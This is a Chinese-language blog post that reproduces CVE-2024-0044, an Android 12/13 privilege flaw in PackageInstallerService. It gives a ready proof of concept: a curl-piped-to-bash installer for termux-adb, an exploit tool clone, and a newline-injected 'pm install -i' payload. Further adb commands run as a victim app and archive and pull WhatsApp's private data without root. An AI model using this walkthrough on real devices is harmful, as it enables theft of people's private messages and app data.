雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网
点击查看-X黑手网
点击查看-X黑手网

复现CVE-2024-0044 安卓设备高危漏洞 影响Android 12,13

背景

存在漏洞的软件包是 platform/frameworks/base,它是 Android 生态系统的基本组成部分。它为 Android 操作系统提供基本功能和服务。此软件包负责管理 Android 框架的各个方面,包括软件包安装和会话管理。不幸的是,PackageInstallerService.java 文件的 createSessionInternal 函数中发现了一个漏洞,该漏洞允许进行不正确的输入验证。此漏洞影响 Android 版本 12 和 13,可能导致本地特权提升,而无需额外的执行特权。利用此漏洞不需要用户交互。

漏洞详细信息

该漏洞源于 PackageInstallerService.java 的 createSessionInternal 函数中输入验证不当。这允许攻击者执行以任何应用程序身份运行的攻击,使他们能够以 Android 调试桥 (ADB) 中的任何应用程序身份执行命令。通过在 packages.list 文件中注入换行符,攻击者可以操纵应用程序安装过程并获得提升的权限。此漏洞带来了重大风险,因为它可能导致本地权限提升,可能允许攻击者访问敏感数据或在受影响的设备上执行未经授权的操作。

PoC

无root手机

即使安装了 ADB 工具的无根 Android 智能手机也可以利用此漏洞

1. 从 F-Droid 安装 Termux 和 Termux:API 应用

2.安装wget: 

pkg install wget

70cbd0b4c6c44480f51448844ce42e1

3.运行termux-adb安装脚本

$ curl -s https://raw.githubusercontent.com/nohajc/termux-adb/master/install.sh | bash

c09d30cd1408fff7c177223cf38571b

以下是所有 ADB 命令的完整列表

GitHub – mzlogin/awesome-adb: ADB Usage Complete / ADB 用法大全

先决条件

  1. 在手机中启用USB调试,并使用USB电缆或无线调试将其连接到机器
  2. 将任何apk下载到您的机器上,您可以使用F-DROID

下载该工具

git clone https://github.com/pl4int3xt/cve_2024_0044.git

image

 

如何使用该工具

 

python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

image

 

-P用于指定要运行的目标包名称

-A指定要在设备中推送的 APK 文件

将生成这样的文件payload.txt

PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

该工具可自动执行某些部件,而其他部件则是手动的。您可以在生成有效负载后退出并手动运行所有命令,也可以继续执行说明

接下来,您需要使用 adb shell 连接到您的设备并粘贴有效负载,并确保在最后一个命令后收到一条消息Success

pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

接下来,我们使用以下命令获取whatsapp数据

pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

创建临时目录:mkdir /data/local/tmp/wa/

为 tar 文件创建占位符:touch /data/local/tmp/wa/wa.tar

设置全开放权限:以确保任何用户都可以在此目录中读取、写入和执行。chmod -R 0777 /data/local/tmp/wa/

切换用户上下文:获得与“受害者”用户相同的权限。run-as victim

存档目标应用程序的数据: ,创建 WhatsApp 数据目录的压缩包。tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

最后拉取数据

adb pull /data/local/tmp/wa/wa.tar

您可以使用或任何其他工具提取数据7z

您可以使用 Whatsapp 聊天导出器将其转换为 HTML

这使您可以在设备上没有root访问权限的情况下获取whatsapp数据

© 版权声明
THE END
喜欢就支持一下吧
点赞9赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容